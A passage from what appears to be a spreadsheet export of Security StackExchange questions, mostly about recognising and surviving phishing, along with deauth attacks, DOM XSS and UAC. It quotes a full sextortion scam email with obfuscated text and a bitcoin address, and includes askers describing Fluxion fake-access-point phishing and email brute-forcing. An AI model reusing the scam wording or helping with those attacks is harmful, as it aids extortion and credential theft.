 &lt;p&gt;Each time, by fear of phishing or credit card theft, I never clicked in the mails or called the numbers present in the mail, and called the companies (once a hotel, the other a booking site) by using the phone number on their site to check whether it is phishing and that my credit cards were safe. &lt;/p&gt;
 &lt;p&gt;The weirdest part is that the bookings do exist! And the emails were legit, the employees genuinely believing that it was me (well, my email address) who did those bookings... The sender address was theirs, the phone number in the mail was the right one,... &lt;/p&gt;
 &lt;p&gt;The bookings were made with another name, with other credit cards (the employees gave me the first numbers of those credits cards and they were not mine), but with my email address! This email address is a very long one, so no way it was done by mistake! I also tried to request a password reset on the booking site (which I never used) to check whether an account has been made there using my address, and my address was not recognized. &lt;/p&gt;
 &lt;p&gt;And, at least for the first one, where I didn't react early, the people did not show up at the hotel and the hotel manager sent me a mail telling that they will take money from the credit card (which is not mine) as a compensation. &lt;/p&gt;
 &lt;p&gt;So my questions are:
 1) what kind of scam is this? Why would you need my email address and not my credit card? 
 2) what can I do to stop it, or at least, avoid aggravation of the issue? I've already changed all my passwords last time for complicated ones (most of them through password generator), and it still takes place.&lt;/p&gt;
 &lt;p&gt;Thanks in advance&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;credit-card&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Google Chrome Apps phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;What prevents an attacker from copying and pasting a Chrome packaged app (which is just a zipped web app) then distributing it on the Chrome webstore under a slightly different name?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are iPhones immune to deauth attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was today rumbling a bit with wireless security, and more specific in creating Fake Access-Points to make Wi-Fi users enter their password on a phishing-page (by using the Fluxion tool).&lt;/p&gt;
 &lt;p&gt;One of the steps require you to deauthenticate the user(s) in order to capture the handshake. When I launched this deauth-attack the Windows-computers and Android-phones connected to that network were indeed disconnected; however my iPhone connected to the same network was not getting affected at all! It's MAC-address was not even shown in the Xterm Fluxion showed. I retried it with different tools but iPhone was never affected.&lt;/p&gt;
 &lt;p&gt;So, is iPhone somehow 'secured' against deauth attacks?
 And why aren't deauth packets authenticated by the Access Point to avoid these deauth attacks are not possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;wireless&gt;&lt;iphone&gt;&lt;deauth-attack&gt;</t>
  </si>
  <si>
    <t>What (besides not complying, and reporting) should I do with blackmail emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received the following email which claims, among other social engineering, to have installed a keylogger on a former system administrator's Linux box:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;I‚Äå kno‚Äåw [old password deleted] o‚Äån‚Äåe o‚Äåf yo‚Äåur pa‚Äåssphra‚Äås‚Äåes. Lets g‚Äået dir‚Äåectly to‚Äå th‚Äåe purpo‚Äås‚Äåe. No‚Äå-on‚Äåe ha‚Äås pai‚Äåd m‚Äåe to ch‚Äåeck abo‚Äåut yo‚Äåu. Yo‚Äåu may not know m‚Äåe and yo‚Äåu a‚Äåre proba‚Äåbly thi‚Äånking why you're g‚Äåetti‚Äång thi‚Äås mai‚Äål? &lt;/p&gt;
  &lt;p&gt;W‚Äåell, i a‚Äåctua‚Äålly pla‚Äåced a‚Äå softwa‚Äår‚Äåe o‚Äån th‚Äåe 18+ vi‚Äåds (porno‚Äågra‚Äåphi‚Äåc mat‚Äåeri‚Äåa‚Äål) w‚Äåebsit‚Äåe a‚Äånd guess wha‚Äåt, yo‚Äåu vi‚Äåsi‚Äåt‚Äåed this si‚Äåte to‚Äå ‚Äåexp‚Äåeri‚Äå‚Äåenc‚Äåe fun (yo‚Äåu kno‚Äåw wha‚Äåt i m‚Äåean). Wh‚Äåen yo‚Äåu w‚Äåere wa‚Äåtchi‚Äång vi‚Äåd‚Äåeo‚Äå clips, your w‚Äåeb bro‚Äåws‚Äåer i‚Äåniti‚Äåa‚Äåt‚Äåed functi‚Äåo‚Äåni‚Äång as a‚Äå R‚Äåemo‚Äåte co‚Äåntrol D‚Äåeskto‚Äåp that has a k‚Äåeylo‚Äågg‚Äåer which pro‚Äåvi‚Äåd‚Äåed m‚Äåe wi‚Äåth a‚Äåcc‚Äåess to‚Äå your di‚Äåspla‚Äåy scr‚Äåeen and a‚Äålso‚Äå w‚Äåebca‚Äåm. Just aft‚Äåer tha‚Äåt, my softwa‚Äår‚Äåe pro‚Äågra‚Äåm co‚Äållect‚Äåed all your co‚Äåntacts from yo‚Äåur M‚Äåess‚Äåenger, so‚Äåci‚Äåa‚Äål n‚Äåetwo‚Äårks, a‚Äånd ‚Äåema‚Äåi‚Äålacco‚Äåunt. a‚Äåft‚Äåer that i‚Äå mad‚Äåe a‚Äå vid‚Äåeo‚Äå. 1st part di‚Äåsplays th‚Äåe vi‚Äådeo yo‚Äåu w‚Äåer‚Äåe vi‚Äå‚Äåewi‚Äång (yo‚Äåu ha‚Äåv‚Äåe a‚Äå ni‚Äåc‚Äåe ta‚Äåst‚Äåe haha‚Äå), a‚Äånd s‚Äåecond pa‚Äårt di‚Äåsplays th‚Äåe r‚Äåeco‚Äårdi‚Äång of yo‚Äåur w‚Äåeb ca‚Äåm, &amp;amp; i‚Äåt i‚Äås yo‚Äåu. &lt;/p&gt;
  &lt;p&gt;Yo‚Äåu wi‚Äåll hav‚Äåe no‚Äåt o‚Äåne but two‚Äå cho‚Äåic‚Äåes. Lets ch‚Äåeck o‚Äåut ‚Äåeach o‚Äåf th‚Äåes‚Äåe so‚Äåluti‚Äåo‚Äåns i‚Äån d‚Äåeta‚Äåi‚Äåls: &lt;/p&gt;
  &lt;p&gt;Fi‚Äårst choi‚Äåc‚Äåe i‚Äås to n‚Äåegl‚Äåect thi‚Äås ‚Äåema‚Äåi‚Äål m‚Äåessa‚Äåg‚Äåe. Th‚Äåen, i a‚Äåm go‚Äåi‚Äång to‚Äå s‚Äåend yo‚Äåur v‚Äåery own r‚Äåeco‚Äård‚Äåed ma‚Äåt‚Äåeri‚Äåa‚Äål to‚Äå ‚Äåea‚Äåch of yo‚Äåur your p‚Äåerso‚Äånal conta‚Äåcts a‚Äånd thus just think co‚Äånc‚Äåerni‚Äång th‚Äåe sha‚Äåme yo‚Äåu f‚Äåeel. Furth‚Äåermo‚Äåre i‚Äåf yo‚Äåu ar‚Äåe in a‚Äå roma‚Äånc‚Äåe, how it i‚Äås going to a‚Äåff‚Äåect? &lt;/p&gt;
  &lt;p&gt;La‚Äåtter a‚Äålt‚Äåerna‚Äåtive is to pay m‚Äåe $7000. L‚Äåets thi‚Äånk o‚Äåf i‚Äåt as a do‚Äåna‚Äåti‚Äåon. Subs‚Äåequ‚Äåently, i mo‚Äåst c‚Äåerta‚Äåi‚Äånly wi‚Äåll a‚Äåsa‚Äåp ‚Äåera‚Äås‚Äåe yo‚Äåur vid‚Äåeo‚Äå fo‚Äåo‚Äåta‚Äåge. Yo‚Äåu co‚Äåuld k‚Äåe‚Äåep go‚Äåi‚Äång dai‚Äåly li‚Äåf‚Äåe li‚Äåk‚Äåe thi‚Äås n‚Äåev‚Äåer ha‚Äåppen‚Äåed a‚Äånd you a‚Äår‚Äåe n‚Äåever goi‚Äång to‚Äå h‚Äåea‚Äår ba‚Äåck a‚Äågai‚Äån fro‚Äåm m‚Äåe. &lt;/p&gt;
  &lt;p&gt;Yo‚Äåu'll ma‚Äåke th‚Äåe pa‚Äåym‚Äåent thro‚Äåugh Bi‚Äåtcoi‚Äån (i‚Äåf yo‚Äåu don't kno‚Äåw this, search 'how to‚Äå buy bit‚Äåco‚Äåi‚Äån' i‚Äån Go‚Äåogle s‚Äåearch ‚Äåengine). &lt;/p&gt;
  &lt;p&gt;B‚ÄåT‚ÄåC‚Äå a‚Äåddr‚Äåess: 1EWaFmaMG33BB6pujkcJUFsp5PxLbQVnhw&lt;br&gt;
  [Ca‚ÄåSe-SeNSi‚ÄåTiVe co‚Äåpy &amp;amp; paste i‚Äåt] &lt;/p&gt;
  &lt;p&gt;if you a‚Äåre curi‚Äåous a‚Äåbo‚Äåut go‚Äåi‚Äång to‚Äå th‚Äåe la‚Äåw, oka‚Äåy, thi‚Äås messa‚Äåge ca‚Äånno‚Äåt b‚Äåe tra‚Äåced ba‚Äåck to‚Äå m‚Äåe. I‚Äå ha‚Äåve co‚Äåv‚Äåer‚Äåed my mo‚Äåves. i‚Äå a‚Äåm a‚Äålso no‚Äåt trying to cha‚Äårg‚Äåe a f‚Äåe‚Äåe so much, i pr‚Äåef‚Äåer to b‚Äåe r‚Äåeward‚Äåed. i‚Äå ha‚Äåv‚Äåe a‚Äå sp‚Äåeci‚Äåfi‚Äåc pix‚Äåel in this ‚Äåema‚Äåil m‚Äåessa‚Äåg‚Äåe, a‚Äånd right no‚Äåw i kno‚Äåw tha‚Äåt yo‚Äåu ha‚Äåv‚Äåe r‚Äåea‚Äåd thro‚Äåugh thi‚Äås m‚Äåessa‚Äåg‚Äåe. You ha‚Äåv‚Äåe o‚Äån‚Äåe da‚Äåy i‚Äån ord‚Äåer to make th‚Äåe pa‚Äåym‚Äåent. i‚Äåf i‚Äå do no‚Äåt r‚Äåec‚Äåei‚Äåv‚Äåe th‚Äåe B‚ÄåitC‚Äåo‚Äåi‚Äåns, i‚Äå wi‚Äåll c‚Äåerta‚Äåi‚Äånly s‚Äåend yo‚Äåur vid‚Äåeo‚Äå to a‚Äåll o‚Äåf yo‚Äåur co‚Äånta‚Äåcts i‚Äåncludi‚Äång m‚Äåemb‚Äåers o‚Äåf yo‚Äåur fa‚Äåmi‚Äåly, co‚Äållea‚Äågues, a‚Äånd so o‚Äån. Ha‚Äåvi‚Äång sa‚Äåid tha‚Äåt, i‚Äåf i do g‚Äået pa‚Äåid, i‚Äå wi‚Äåll ‚Äåera‚Äås‚Äåe th‚Äåe r‚Äåecordi‚Äång ri‚Äåght awa‚Äåy. i‚Äåf yo‚Äåu wa‚Äånt ‚Äåevi‚Äåd‚Äåenc‚Äåe, reply with Y‚Äåes th‚Äåen i‚Äå wi‚Äåll send your vi‚Äåd‚Äåeo‚Äå r‚Äåecordi‚Äång to‚Äå yo‚Äåur 7 conta‚Äåcts. i‚Äåt i‚Äås a‚Äå no‚Äån:negoti‚Äåabl‚Äåe off‚Äåer, thus do no‚Äåt wa‚Äåst‚Äåe my persona‚Äål ti‚Äåme &amp;amp; yo‚Äåurs by r‚Äåesponding to‚Äå thi‚Äås ‚Äåema‚Äåil.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I know the standard response to ordinary spam, and the ordinary response to phishing. I reported this as phishing because it seemed a closest fit, and furthermore far more severe than "BETH ADD REAL INCHES TO YOUR PEN1S!".&lt;/p&gt;
 &lt;p&gt;How can I, or should I, respond to blackmail spam? Is any LE followup appropriate?&lt;/p&gt;</t>
  </si>
  <si>
    <t>DOM Based XSS attacks: what is the most dangerous example?</t>
  </si>
  <si>
    <t>&lt;p&gt;I knew that XSS attacks (‚Äúnon-persistent‚Äù and ‚Äúpersistent‚Äù) can hijack user session, deface websites, conduct phishing attack, etc.&lt;/p&gt;
 &lt;p&gt;However, I can't understand what is dangerous of DOM Based XSS if its not able to (Hijack session, click jacking, etc)?&lt;/p&gt;
 &lt;p&gt;I reviewed &lt;a href="https://www.owasp.org/index.php/DOM_Based_XSS"&gt;OWSAP DOM Based XSS&lt;/a&gt; and also &lt;a href="http://www.webappsec.org/projects/articles/071105.shtml"&gt;This Page&lt;/a&gt; that outlines these two notes:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;ol&gt;
  &lt;li&gt;&lt;p&gt;The malicious payload was not embedded in the raw HTML page at any time (unlike the other flavors of XSS).&lt;/p&gt;&lt;/li&gt;
  &lt;li&gt;&lt;p&gt;This exploit only works if the browser does not modify the URL characters. Mozilla automatically encodes &amp;lt; and &gt; (into %3C and %3E,
  respectively) in the document.&lt;/p&gt;&lt;/li&gt;
  &lt;/ol&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Then, what kind of attack (XSS DOM Based) Can accomplish?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;attack-prevention&gt;&lt;javascript&gt;&lt;xss&gt;&lt;injection&gt;</t>
  </si>
  <si>
    <t>How realistic is to be 'hacked' by ONLY clicking a link</t>
  </si>
  <si>
    <t>&lt;p&gt;In the case of phishing training, most training will say &amp;quot;don't click the link, you can get hacked!&amp;quot;&lt;/p&gt;
 &lt;p&gt;If there was an exploit that could bypass the chrome sandbox on an up-to-date verison of chrome, would that person realistically target an employee at a regional insurance provider or some other non fortune 100 company? Seems like exploits of that magnitude would be rare, and highly valuable.&lt;/p&gt;
 &lt;p&gt;Obviously, a hacker can get some pieces of information about your PC and correlate those with your email, but besides that, what can they really do if you don't click or fill out information, etc.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;sandbox&gt;</t>
  </si>
  <si>
    <t>I visited a malicious link and I am paranoid</t>
  </si>
  <si>
    <t>&lt;p&gt;I am a Mac User and while I was on youtube, I clicked on a url www.giftforfans .us 
 I don't know what I was thinking but I got phished pretty hard...
 Now I am a bit paranoid and I am wondering if people's computer can get infected simply by just visiting this website... 
 I don't know what the website does but I don't think it has downloaded anything on my computer on my download folder... Is it possible that this website somehow got my userID and Password of my email credential? 
 Thanks for all the help&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Reset links in password expiration emails</t>
  </si>
  <si>
    <t>&lt;p&gt;Our organization is rolling out yearly password expiration to our 40,000+ users this fall and we have been socializing this change for some time now. However being such a large organization, our users are also consistently bombarded with phishing emails. Our rule of thumb we tell our users is "Don't click on links in emails you didn't expect". &lt;/p&gt;
 &lt;p&gt;However now that we are rolling out password expiration, we are planning to send emails to users who's passwords will expire soon urging them to change their password. &lt;/p&gt;
 &lt;p&gt;The emails:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Are well branded and look professional&lt;/li&gt;
 &lt;li&gt;Personally identify the user with their username and an internal (although not completely private) ID number&lt;/li&gt;
 &lt;li&gt;Clearly explain what is going on, and what action to take&lt;/li&gt;
 &lt;li&gt;Contain proper headers identifying the sending email server is from our organization for advanced users (e.g. we aren't sending these from off-site)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;However to make life significantly easier on users, we have a couple links in the emails:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;A link to our documentation for password expiration on our website&lt;/li&gt;
 &lt;li&gt;A link to the actual password reset application&lt;/li&gt;
 &lt;li&gt;A link to the password recovery application (for lost passwords)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;There is also a mini-guide on how to identify trustworthy sites by checking the URL and SSL certificate, and when in doubt to type out the address to our homepage itself, then follow the links. &lt;/p&gt;
 &lt;p&gt;My question is:&lt;/p&gt;
 &lt;p&gt;Is there any amount of legitimacy we can add to the password expiration email so users can trust this email (which they probably weren't expecting) and click on the links, or should we ditch the links all together and just tell users to do the process themselves instead of clicking on a convenient button in the email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;trust&gt;</t>
  </si>
  <si>
    <t>Random persistent Gmail password requests from Google</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to figure out something for my father in law. This persistent popup keeps interrupting anything anyone is doing on his desktop by requesting he put in his password. I told him not to. It seems odd that Google would be so intrusive and I also can't highlight or click any of the area the arrow points to, also odd. It seems like it may be a phishing for password thing but I might be wrong. I'm using Teamviewer right now and I can't see the end of the http so that also seems strange. Any help would be greatly appreciated ! thanks in advance, Claire&lt;a href="https://i.stack.imgur.com/hTAEv.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/hTAEv.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;google&gt;&lt;phishing&gt;&lt;imap&gt;</t>
  </si>
  <si>
    <t>when you are phished, what do they get?</t>
  </si>
  <si>
    <t>&lt;p&gt;Lets say I was foolish enough to press on a YouTube video on Facebook that ended up being what I suspect is a phishing link. What can they potentially get?&lt;/p&gt;
 &lt;p&gt;I had three tabs open: (1) my phpMyAdmin control panel, (2) another random site logged in, and (3) the Facebook session which I navigated away from when I clicked the link.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Should I be worried about the script having picked up cookie information from either of the first two tabs? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;They can't get session data because that is stored on the server, not the client right? If I understand correctly, the best they could do is get the session id that is stored in a cookie and then try to use my session id as an imposter.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Lets say like I had a gmail session on tab 3 before going to Facebook, is the gmail session compromised now?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Is this is phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email, purporting to be from Microsoft Account as a Security Alert. The address looks legit (account-security-noreply@accountprotection.microsoft.com) but the problem is, the email address they refer to in the body of the email is not a Microsoft address. As a matter of fact, it's an @mac.com address. Everything I have seen in the community seems to indicate the email is legit, but why would I get a security alert from Microsoft for an @mac account? And if, as I suspect, it isn't legit, how do I report the email? I have already blocked the sender, and I haven't clicked on anything in the body of the email.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Some questions about penetration testing distribution Backtrack 5</t>
  </si>
  <si>
    <t>&lt;p&gt;I know just the basics of backtrack and I want to ask some questions about it:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Can you attack an ftp server using backtrack? an email server?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I have a Centos virtual private server and backtrack is on my PC, Can I change the IP-address of backtrack to my VPS IP-address and do phishing using my VPS IP-address? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Can I do brute force attack to crack email passwords using backtrack?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;webserver&gt;&lt;email&gt;&lt;phishing&gt;&lt;ftp&gt;</t>
  </si>
  <si>
    <t>Is there a way to download the Firefox Phishing and Malware Protection list?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm building an app that needs to check bad websites and was wondering if there is a way to download the Firefox bad site list directly outside of the browser? The list is described in the Mozilla.org knowledgebase article below and is automatically downloaded by the Firefox browser every 30 minutes.&lt;/p&gt;
 &lt;p&gt;This question is specifically for the list that Firefox downloads, not the Google Safe Browsing service.&lt;/p&gt;
 &lt;p&gt;The Mozilla KB article says the following:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;How does Phishing and Malware Protection work in Firefox?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Phishing and Malware Protection works by checking the sites that you visit against lists of reported phishing, unwanted software and malware sites. These lists are automatically downloaded and updated every 30 minutes or so when the Phishing and Malware Protection features are enabled.&lt;/p&gt;
  &lt;p&gt;When you download an application file, Firefox checks the site hosting it against a list of sites known to contain "malware". If the site is found on that list, Firefox blocks the file immediately, otherwise it asks Google‚Äôs Safe Browsing service if the software is safe by sending it some of the download‚Äôs metadata.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;li&gt;Ref: &lt;a href="https://support.mozilla.org/en-US/kb/how-does-phishing-and-malware-protection-work#w_how-does-phishing-and-malware-protection-work-in-firefox" rel="nofollow noreferrer"&gt;https://support.mozilla.org/en-US/kb/how-does-phishing-and-malware-protection-work#w_how-does-phishing-and-malware-protection-work-in-firefox&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;firefox&gt;&lt;antimalware&gt;</t>
  </si>
  <si>
    <t>How does anti-phishing software work to identify phishing sites?</t>
  </si>
  <si>
    <t>&lt;p&gt;To clarify, my question isn't on how to protect myself from phishing. What I'm curious about is how exactly software can identify whether or not a website is designed for phishing, ignoring word identifiers/scanners to looking for spam/phishing sounding material.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Collecting Pre-Authorized Debit (PAD) &amp; Credit Card (PACC) Agreements Electronically</t>
  </si>
  <si>
    <t>&lt;p&gt;I am looking for best practices regarding the collection of Pre-Authorized Debit (PAD) agreements electronically. The Canadian Payment Association only seems to provide the following statement regarding electronic PAD agreements:&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;"If the customer provides their authorization electronically, it is your responsibility to verify that the personal and/or banking information set out in that payor's PAD agreement actually belongs to that payor using a commercially reasonable method of verification approved by your sponsoring financial institution."&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;First of all, does anybody have any insight into what this means exactly. I am waiting to hear back from the bank, but so far first level support at RBC Express doesn't really know. &lt;/p&gt;
 &lt;p&gt;What would they be looking to be verified exactly, and what would a commercially reasonable method be? Would I need a system for customers to log into, or could I just have a field on the form where they provide their student/account number so we can apply the new payment method to the right account in our record system when we receive the agreement?&lt;/p&gt;
 &lt;p&gt;The statement doesn't go into details about the security of collecting peoples' sensitive financial information, and I'm wondering if the same security precautions that are required when processing a payment online apply.&lt;/p&gt;
 &lt;p&gt;At first I was thinking I could simply send a PDF by email which they fill out and return, but obviously this is a bad idea since not everybody's emails are encrypted. I also thought of creating a form on our public website which could be linked to, but don't know if the fact that it's public makes it insecure, even over HTTPS.&lt;/p&gt;
 &lt;p&gt;I was also wondering if sending a link to a private Google Form would be good enough. Google Forms use HTTPS, so would this be sufficient, especially if the form is not public and only accessible potentially to customers who have received a link to it in the past?&lt;/p&gt;
 &lt;p&gt;Google warns not to submit passwords through their forms, I believe because they're a popular platform for phishing scams, but they don't warn specifically against the collection/submission of financial information -- maybe this is just implied by the other warning, I don't know.&lt;/p&gt;
 &lt;p&gt;I realize our bank might be the best source for clarification on some of this, but any experience or insights into this would be greatly appreciated.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;PAD Agreement form fields currently required for our written aggreement:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Desired Withdrawal Date (1st or 15th)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Account Number (at our music school)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Student Name (actively taking lessons at our school)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Name of Financial Institution (FI)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;FI Address or Branch Name&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;FI Account &amp;amp; Transit Numbers&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Name(s) of FI Account Holder&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;Address(s) of FI Account Holder (street, city, province, postal code)&lt;/li&gt;
 &lt;li&gt;Residence Phone #&lt;/li&gt;
 &lt;li&gt;Business Phone #&lt;/li&gt;
 &lt;/ul&gt;
 &lt;hr&gt;
 &lt;p&gt;PACC form fields that will be required:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Account Number (at our music school)&lt;/li&gt;
 &lt;li&gt;Student Name (actively taking lessons at our school)&lt;/li&gt;
 &lt;li&gt;Card Type (Visa or Mastercard)&lt;/li&gt;
 &lt;li&gt;Credit Card No. &amp;amp; Expiry Date&lt;/li&gt;
 &lt;li&gt;Cardholder Name &amp;amp; Address (Street, City, Province, Postal Code)&lt;/li&gt;
 &lt;li&gt;Home &amp;amp; Work Phone No.'s&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;credit-card&gt;&lt;payment-gateway&gt;</t>
  </si>
  <si>
    <t>How is Paypal spying on my incognito browsing?</t>
  </si>
  <si>
    <t>&lt;p&gt;This weekend, Paypal started sending me emails with discount offers based on websites I visit in incognito mode on my phone.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I have an Android smartphone and am browsing in incognito mode in Chrome. I have the latest security updates for my phone installed (they're issued monthly) and Chrome is up-to-date&lt;/li&gt;
 &lt;li&gt;I have a Paypal account but only use it rarely; &lt;strong&gt;I have never logged into my Paypal account on my phone&lt;/strong&gt;, but have logged into my account from my PC on the same home network (and therefore same IP address).&lt;/li&gt;
 &lt;li&gt;I close all my incognito tabs (thus clearing any cookies) every day or two&lt;/li&gt;
 &lt;li&gt;On two separate occasions over two days, about an hour after I visited the website for a retailer, Paypal sent me an email offer to save $5 if I made a purchase on that retailer's website with Paypal (these were two different retailers). I have never before received this kind of email offer from Paypal.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I do not believe this is a phishing scam. The emails from Paypal look completely legit, with the correct email address and none of the typos, misplaced graphics, or other telltale signs of a copycat email. The emails do not ask me for my credentials or include a link to a login page; they do include a valid link to the retailer's real website (not a similar looking phishing website). They instruct me to purchase an item from the website and use Paypal as my payment method in order to redeem the offer.&lt;/p&gt;
 &lt;p&gt;I am trying to think of an explanation for this disturbing invasion of my privacy. Unless Paypal is knowingly using illegal spyware to monitor web browsing on smartphones, this seems like the most likely explanation (though I'm not sure if it's legal): The retailers have an agreement with Paypal to send Paypal a list of every IP address that visits their website; Paypal correlates this with a list of known IP addresses of their users and emails the users it recognizes with offers.&lt;/p&gt;
 &lt;p&gt;Are there other possibilities I haven't considered? What can I do to protect myself from Paypal's monitoring of my private web browsing, other than resetting my modem to change my IP address?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;spyware&gt;</t>
  </si>
  <si>
    <t>user67447</t>
  </si>
  <si>
    <t>Why does Yahoo cached results button lead to blacklisted "malicious"/"phishing" IP?</t>
  </si>
  <si>
    <t>&lt;p&gt;I did a search for some on Yahoo, I then click on the little arrow next to one of the search results and then clicked the &lt;code&gt;Cached&lt;/code&gt; button because I wanted to view an older version of the page. It took me to the following URL:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://98.139.236.92/search/srpcache?p=bath+cheese&amp;amp;ei=UTF-8&amp;amp;hspart=mozilla&amp;amp;hsimp=yhs-001&amp;amp;fr=yhs-mozilla-001&amp;amp;u=http://cc.bingj.com/cache.aspx?q=bath+cheese&amp;amp;d=4563864025038867&amp;amp;mkt=en-US&amp;amp;setlang=en-US&amp;amp;w=sVSPjqG8BYYbZ4DSlYO9uBJj_-F6Hk1P&amp;amp;icp=1&amp;amp;.intl=us&amp;amp;sig=lAvXGeEt7zIwy1nClj6spQ--
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Which took me to a page which reportedly (by uMatrix in Firefox) had one script on it which was allowed. My browser told me, or at least I was taken to a page which said, that my browser was unable to connect.&lt;/p&gt;
 &lt;p&gt;Because this is a rather strange occurrence I scanned the IP using &lt;a href="https://www.virustotal.com/en/url/11b75824e4c19c3dca8b6eb95150929dcc9ebd1edf54c7f1791f6238377e5487/analysis/1495875547/" rel="nofollow noreferrer"&gt;VirusTotal&lt;/a&gt;. So far it's not looking good:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/wZ3DV.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/wZ3DV.png" alt="VirusTotal report for IP"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;There are also multiple reports as follows on this either being a phishing site or malicious:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://www.siteadvisor.com/sites/98.139.236.92" rel="nofollow noreferrer"&gt;McAfee&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://quttera.com/detailed_report/98.139.236.92" rel="nofollow noreferrer"&gt;Quttera&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://sitecheck.sucuri.net/results/98.139.236.92" rel="nofollow noreferrer"&gt;Securi&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I have an up-to-date 64-bit Arch Linux installation with Firefox 53.0.3 and GNOME 3.24.2. Is this anything to worry about? Have Yahoo been compromised or is there a perfectly innocent explanation for all this?&lt;/p&gt;
 &lt;p&gt;I think a possible reason that my browser couldn't reach the site is because it doesn't appear to support HTTPS and thus HTTPS Everywhere would have blocked it from loading since it only allows HTTPS and automatically redirects to it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;linux&gt;&lt;firefox&gt;&lt;blacklist&gt;&lt;yahoo&gt;</t>
  </si>
  <si>
    <t>Would it be possible for me to become infected just by opening a Facebook message?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received one of those obvious fake "is this you?" and some fake Youtube link on Facebook Messenger. I don't know what it redirected to as I didn't click it (I only hovered over it to see if it was a legit Youtube URL, which it wasn't)&lt;/p&gt;
 &lt;p&gt;Am I safe as I only read the message and didn't click the link or view it on any of my devices, or would it be possible for me to get malware just by viewing the Facebook message itself?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;spam&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Would a mechanism for a same-password separate admin account solve the problem of UAC bypasses in Windows?</t>
  </si>
  <si>
    <t>&lt;p&gt;The standard role-separation mechanism in Windows for a local administrator is to have a single account, but protect it using UAC, and configure it for Always Notify if increased security is desired. Unfortunately, this mechanism perpetually is vulnerable to bypasses. See &lt;a href="https://security.stackexchange.com/questions/189491/microsoft-said-uac-is-not-a-security-barrier-but-in-what-cases/189553"&gt;Microsoft said UAC is not a security barrier. But in what cases?&lt;/a&gt;&lt;/p&gt;
